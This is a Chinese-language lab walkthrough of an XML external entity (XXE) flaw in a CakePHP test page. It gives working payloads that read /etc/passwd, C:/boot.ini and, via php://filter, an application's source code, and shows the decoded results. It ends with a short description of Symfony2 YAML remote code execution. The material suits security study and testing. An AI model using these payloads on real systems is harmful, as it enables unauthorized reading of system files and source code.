CakePHP 漏洞
CakePHP XML外部实体漏洞
搭建好环境,访问
http://172.16.12.2/simplexml_load_string.php
进行burp抓包,注入poc
Linux:
<!DOCTYPE cakephp [
<!ENTITY payload SYSTEM "file:///etc/passwd" >]>
<request>
<xxe>&payload;</xxe>
</request>
Windows:
<!DOCTYPE cakephp [
<!ENTITY payload SYSTEM "file:///C:/boot.ini" >]>
<request>
<xxe>&payload;</xxe>
将会读取到passwd文件的内容
如果修改XML中的外部实体为其他协议,如php://filter/read=convert.base64-encode/resource=index.php
,在Proxy选项卡的原数据包中粘贴XML内容,点击FORWARD放行请求,返回的结果在浏览器上显示如下
返回值为PD9waHANCnBocGluZm8oKTsNCj8+
,经过base64解码,可以看到字符串是index.php的源代码
<?php
phpinfo();
?>
我们来访问一下index.php,可以看到确实是执行了phpinfo();函数
Symfony2 漏洞
Symfony YAML组件多个远程PHP代码执行漏洞
Symfony是PHP Web开发框架。Symfony2 YAML Component可解析YAML字符串以转换为PHP数组,也可转换PHP数组为YAML字符串。
Symfony YAML组件存在多个远程PHP代码执行漏洞,攻击者可利用这些漏洞在受影响应用中执行任意PHP代码。